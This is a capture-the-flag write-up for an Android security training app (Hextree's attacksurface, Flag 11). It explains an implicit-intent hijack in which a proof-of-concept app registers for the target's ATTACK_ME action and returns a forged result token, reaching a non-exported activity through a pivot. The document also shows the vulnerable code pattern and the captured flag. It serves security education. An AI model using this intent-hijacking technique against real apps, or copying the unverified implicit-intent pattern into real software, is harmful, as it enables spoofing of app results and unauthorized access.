Static Analysis
AndroidManifest.xml
Inspecting the Flag11Activity entry in the AndroidManifest.xml file, we see the following:
<activity
android:name="io.hextree.attacksurface.activities.Flag11Activity"
android:exported="false"/>
Since exported is set to false, we can't start this activity directly from our exploit APK, but as we saw with Flag5Activity, we can use that activity as a pivot to reach it.
Flag11Activity Class
public class Flag11Activity extends AppCompactActivity {
/**
 * Sets the challenge metadata for this activity: display name, tag, flag value and tag colour.
 * None of these fields is declared in this listing; presumably they are inherited from the
 * AppCompactActivity base class (confirm in the decompiled base class).
 */
public Flag11Activity() {
    this.name = "Flag 11 - Respond to implicit intent";
    this.tag = "ImplicitIntent";
    // Base64-looking string, not the readable HXT{...} flag; presumably decoded or decrypted
    // elsewhere before it is shown (not visible in this listing).
    this.flag = "OO4jpSDTSrgJ9c+o3AXXL+awhn5K0bqUYrQwJA870/c=";
    this.tagColor = R.color.red;
}
/**
 * When the launching intent carries no action, fires an implicit intent with the action
 * io.hextree.attacksurface.ATTACK_ME and waits for a result from whichever activity handles it.
 *
 * The outgoing intent names only an action (no component or package), so Android resolves the
 * receiver from the intent filters of installed apps; this code does not restrict who may answer.
 */
@Override // io.hextree.attacksurface.AppCompactActivity, androidx.fragment.app.FragmentActivity, androidx.activity.ComponentActivity, androidx.core.app.ComponentActivity, android.app.Activity
protected void onCreate(Bundle bundle) {
    super.onCreate(bundle);
    this.f = new LogHelper(this);
    // Only the "no action" case is handled; an intent that carries any action skips the whole block.
    if (getIntent().getAction() == null) {
        // Duration 1 is Toast.LENGTH_LONG (the decompiler inlined the constant).
        Toast.makeText(this, "Sending implicit intent to\nio.hextree.attacksurface.ATTACK_ME", 1).show();
        // Implicit intent: action only, no setPackage()/setComponent() to pin the receiver.
        Intent intent = new Intent("io.hextree.attacksurface.ATTACK_ME");
        // 8 is Intent.FLAG_DEBUG_LOG_RESOLUTION: the system logs how this intent gets resolved.
        intent.addFlags(8);
        try {
            // Request code 42; the handler's reply is delivered to onActivityResult().
            startActivityForResult(intent, 42);
        } catch (RuntimeException e) {
            // Presumably ActivityNotFoundException (a RuntimeException) when nothing matches the
            // action, which is what the toast text reports.
            e.printStackTrace();
            Toast.makeText(this, "No app found to handle the intent\nio.hextree.attacksurface.ATTACK_ME", 1).show();
            finish();
        }
    }
}
/**
 * Handles the reply to the implicit intent sent from onCreate().
 *
 * The decompiler names i and i2 correspond to requestCode and resultCode in the Android
 * signature; neither is inspected here. The only condition for success is a non-null result
 * intent whose int extra "token" equals 1094795585 (0x41414141).
 *
 * NOTE(review): nothing in this method identifies the app that produced the result, so the
 * token is taken on trust from whichever activity resolved the implicit intent. Pinning the
 * outgoing intent to a known package or component, and not treating result extras as
 * authenticated, would close that gap.
 */
@Override // io.hextree.attacksurface.AppCompactActivity, androidx.fragment.app.FragmentActivity, androidx.activity.ComponentActivity, android.app.Activity
protected void onActivityResult(int i, int i2, Intent intent) {
    // -1 is the default when the extra is missing, so a reply without "token" fails the check.
    if (intent != null && intent.getIntExtra("token", -1) == 1094795585) {
        // LogHelper is defined elsewhere; presumably this records the token value for display.
        this.f.addTag(1094795585);
        // success() is defined outside this listing; presumably it marks the challenge solved.
        success(this);
    }
    super.onActivityResult(i, i2, intent);
}
}
Upon reviewing the code, we see that when this activity is started it sends an implicit intent with the io.hextree.attacksurface.ATTACK_ME action. The intent is started with startActivityForResult, so the activity expects a result back. In the onActivityResult function, it expects the result coming from us to carry an int extra called token with the value 1094795585. Because the intent is implicit and the result is accepted without checking which app answered, any installed app that declares a matching intent filter can supply that token. Let's create the POC for it.
Creating POC
AndroidManifest.xml
The first thing we want to do is set the exported option to true so other apps can call this activity.
Secondly, we need to make this activity a default receiver for the io.hextree.attacksurface.ATTACK_ME action, so that when the target fires an implicit intent with this action it goes to our activity.
<activity
android:name=".Flag11"
android:exported="true">
<intent-filter>
<action android:name="io.hextree.attacksurface.ATTACK_ME" />
<category android:name="android.intent.category.DEFAULT" />
</intent-filter>
</activity>
Flag11.java
Now we create an activity that receives the intent and returns a result carrying the extra called token.
We also use the pivot utility, which uses Flag5Activity as a pivot, so we can start Flag11Activity; it's not exported, so we can't call it directly.
public class Flag11 extends AppCompatActivity {
/**
 * Entry point with two roles, selected by whether a caller is waiting for a result.
 *
 * If the activity was started for a result, it logs the caller, replies with an intent
 * carrying the int extra "token" = 1094795585 and finishes at once. Otherwise it shows the
 * layout with a button that starts Flag11Activity through the PivotIntent helper.
 */
@Override
protected void onCreate(Bundle savedInstanceState) {
    super.onCreate(savedInstanceState);

    // Non-null only when another activity started us with startActivityForResult().
    ComponentName caller = getCallingActivity();

    if (caller == null) {
        // Opened from our own APK: show the UI with the trigger button.
        setContentView(R.layout.activity_flag11);
        getSupportActionBar().setTitle("Flag 11");
        Button launchButton = findViewById(R.id.button_flag11);
        launchButton.setOnClickListener(new View.OnClickListener() {
            @Override
            public void onClick(View clicked) {
                Log.v("Flag11 - Debug", "Attempting to get the flag");
                // Explicit intent naming the non-exported target activity.
                ComponentName target = new ComponentName("io.hextree.attacksurface",
                        "io.hextree.attacksurface.activities.Flag11Activity");
                Intent targetIntent = new Intent().setComponent(target);
                // PivotIntent is defined elsewhere in the project; it wraps the target intent
                // so that it is delivered through the pivot activity.
                startActivity(PivotIntent.create(targetIntent));
            }
        });
        return;
    }

    // Started for a result: answer with the expected extra and close immediately.
    Log.v("Flag11 - Debug", "Flag11 started for a result by: " + caller.flattenToString());
    Intent reply = new Intent();
    reply.putExtra("token", 1094795585);
    setResult(RESULT_OK, reply);
    finish();
}
}
Flag
HXT{sent-back-result-1897djh}